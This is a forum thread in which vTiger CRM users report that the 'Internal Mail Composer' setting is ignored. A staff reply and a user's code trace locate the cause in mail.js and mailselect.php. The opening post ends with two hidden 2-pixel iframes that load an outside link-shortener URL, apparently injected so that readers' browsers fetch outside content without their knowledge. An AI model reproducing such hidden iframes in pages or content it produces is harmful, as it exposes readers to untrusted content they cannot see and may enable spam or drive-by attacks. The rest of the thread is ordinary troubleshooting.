Internal Mail Composer

Hi I want to use my mail client (Outlook) to send e-mails composed via vTiger. According to the documentation I have seen, this should be possible by setting the Internal Mail Composer option to "no" in my user account. However have done so, and restarted the server, etc. I still get the vTiger e-mail interface when I send an e-mail. How can I use Outlook to compose e-mails? <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;

  • have the same issue. please don't mind me joining this topic.
  • sorry to interrupt dear;
    please tell me the relevance of using vtiger as composer and out look's smtp to send.

    thanks
  • off course, of relevance would be the spell check for foreign languages <!-- s:) --><img src="{smilies_path}/icon_smile.gif" alt=":)" title="smile" /><!-- s:) --> <!-- s:wink: --><img src="{smilies_path}/icon_wink.gif" alt=":wink:" title="wink" /><!-- s:wink: -->
  • i'm having this very same issue. the internal email composer triggers regardless of what has been selected in the user profile.

    how do i fix this?
  • this particularly occurs in the invoice module when i click to send the invoice by email. it appears to be hard-coded here.

    is it possible to have it use my desktop client to send the invoice instead of the internal mailer? another reason besides spell-check being that my client wants to use html signatures, which it appears vtiger's composer does not support.
  • hi all,

    in most of the places of the crm like accounts, contacts etc., the internal mailer settings works well. to confirm this, please check it out on our demo servers - <!-- m --><a class="postlink" href="http://en.vtiger.com">http://en.vtiger.com</a><!-- m --> (5.0.4) or <!-- m --><a class="postlink" href="http://en.vtiger.com/wip">http://en.vtiger.com/wip</a><!-- m --> (5.1.0 under development).

    but there are few places of the crm like invoice, quotes where the internal mailer setting is not reflecting. thanks for bringing this to our notice. we have tracked this issue in our bug tracker. we shall soon address this. for further reference to the issue, please refer to:-

    have tried the demo (5.0.4) and get the same result. i set up a new user and set "internal mail composer" to no (unchecked). when i try using leads, contacts, accounts to send an e-mail, up pops the internal mail composer. am i doing something wrong? if you are able to get this working, please advise step by step instructions as i'd like to be able to use this feature.

    thanks.
  • hi,

    i tried the same on the 5.0.4 demo server. i have created a test user called 'vtigertestuser'. (password = vtigertestuser). i have set the internal mail composer to 'no' for this user.

    from contacts list view, when i click on one of the email id's, the compose box of outlook express opens up. (trying this on firefox 2.x).

    please try this out and give me more details on your test environment if you are still not able to get it working.
  • thanks, that works, however i was using the "send mail" button which it appears uses the internal mail program.
  • hi asha,

    i have encountered the same problem as wicklowtiger. if you click the emai address of a contact directly, there is no problem.

    however, however, if you click the button "send mail" at the end of the contact list ---> it pops up the window "select email ids" --> click select --> internal email composer keeps showing up (even if it is disabled). please try.

    i have traced the code a bit and have checked the function validate_sendmail and sendmail in mail.js, there is no checking of the flag of internal mail composer in these functions. i think this is the reason why the internal mail composer always shows up.

    also i think there is another bug in mailselect.php line 101-104. selectemail.tpl shouldn't be shown if there is only one email address and no yahoo id.

    asha, please check. thank you!
